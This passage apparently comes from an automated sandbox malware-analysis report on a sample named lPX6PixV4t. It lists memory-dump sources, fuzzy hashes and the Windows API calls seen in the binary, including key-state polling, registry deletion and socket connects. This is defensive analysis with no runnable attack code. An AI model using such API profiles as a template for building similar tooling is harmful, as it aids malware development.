                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                          • String ID: %s%d
                          • API String ID: 2645982514-1110647743
                          • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                          • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                          • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                          • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                          • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                          • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                          • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                          APIs
                          • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                          • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Process$CloseCountersCurrentHandleOpen
                          • String ID:
                          • API String ID: 3488606520-0
                          • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                          • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                          • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                          • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                          APIs
                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ConnectRegistry_memmove_wcslen
                          • String ID:
                          • API String ID: 15295421-0
                          • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                          • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                          • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                          • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                          APIs
                          • GetCursorPos.USER32(?), ref: 004563A6
                          • ScreenToClient.USER32(?,?), ref: 004563C3
                          • GetAsyncKeyState.USER32(?), ref: 00456400
                          • GetAsyncKeyState.USER32(?), ref: 00456410
                          • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: AsyncState$ClientCursorLongScreenWindow
                          • String ID:
                          • API String ID: 3539004672-0
                          • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                          • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                          • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                          • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                          APIs
                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                          • Sleep.KERNEL32(0000000A), ref: 0047D455
                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Interlocked$DecrementIncrement$Sleep
                          • String ID:
                          • API String ID: 327565842-0
                          • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                          • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                          • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                          • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                          APIs
                          • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                          • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                          • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                          • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: PrivateProfile$SectionWrite$String
                          • String ID:
                          • API String ID: 2832842796-0
                          • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                          • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                          • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                          • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                          APIs
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                          • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Enum$CloseDeleteOpen
                          • String ID:
                          • API String ID: 2095303065-0
                          • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                          • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                          • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                          • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00436A24
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: RectWindow
                          • String ID:
                          • API String ID: 861336768-0
                          • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                          • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                          • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                          • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                          APIs
                          • SendMessageW.USER32 ref: 00449598
                            • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                          • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                          • _wcslen.LIBCMT ref: 0044960D
                          • _wcslen.LIBCMT ref: 0044961A
                          • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSend$_wcslen$_wcspbrk
                          • String ID:
                          • API String ID: 1856069659-0
                          • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                          • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                          • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                          • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                          APIs
                          • GetCursorPos.USER32(?), ref: 004478E2
                          • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                          • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                          • GetCursorPos.USER32(00000000), ref: 0044796A
                          • TrackPopupMenuEx.USER32(00A86490,00000000,00000000,?,?,00000000), ref: 00447991
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CursorMenuPopupTrack$Proc
                          • String ID:
                          • API String ID: 1300944170-0
                          • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                          • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                          • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                          • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                          APIs
                          • GetClientRect.USER32(?,?), ref: 004479CC
                          • GetCursorPos.USER32(?), ref: 004479D7
                          • ScreenToClient.USER32(?,?), ref: 004479F3
                          • WindowFromPoint.USER32(?,?), ref: 00447A34
                          • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Client$CursorFromPointProcRectScreenWindow
                          • String ID:
                          • API String ID: 1822080540-0
                          • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                          • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                          • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                          • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00447C5D
                          • ScreenToClient.USER32(?,?), ref: 00447C7B
                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                          • EndPaint.USER32(?,?), ref: 00447D13
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ClientPaintRectRectangleScreenViewportWindow
                          • String ID:
                          • API String ID: 659298297-0
                          • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                          • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                          • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                          • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                          APIs
                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                            • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                            • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                            • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                            • Part of subcall function 00440D98: SendMessageW.USER32(00A81AB8,000000F1,00000000,00000000), ref: 00440E6E
                            • Part of subcall function 00440D98: SendMessageW.USER32(00A81AB8,000000F1,00000001,00000000), ref: 00440E9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Window$EnableMessageSend$LongShow
                          • String ID:
                          • API String ID: 142311417-0
                          • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                          • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                          • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                          • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                          • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                          • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                          • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                          APIs
                          • IsWindowVisible.USER32(?), ref: 00445879
                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                          • _wcslen.LIBCMT ref: 004458FB
                          • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                          • String ID:
                          • API String ID: 3087257052-0
                          • Opcode ID: 622372a4a32610ce73fb3647056b26e365a1681bd10d6cc102ac189a3bd4553b
                          • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                          • Opcode Fuzzy Hash: 622372a4a32610ce73fb3647056b26e365a1681bd10d6cc102ac189a3bd4553b
                          • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                          APIs
                            • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                          • socket.WSOCK32(00000002,00000001,00000006), ref: 004653FE
                          • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                          • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                          • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                          • closesocket.WSOCK32(00000000), ref: 00465481
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
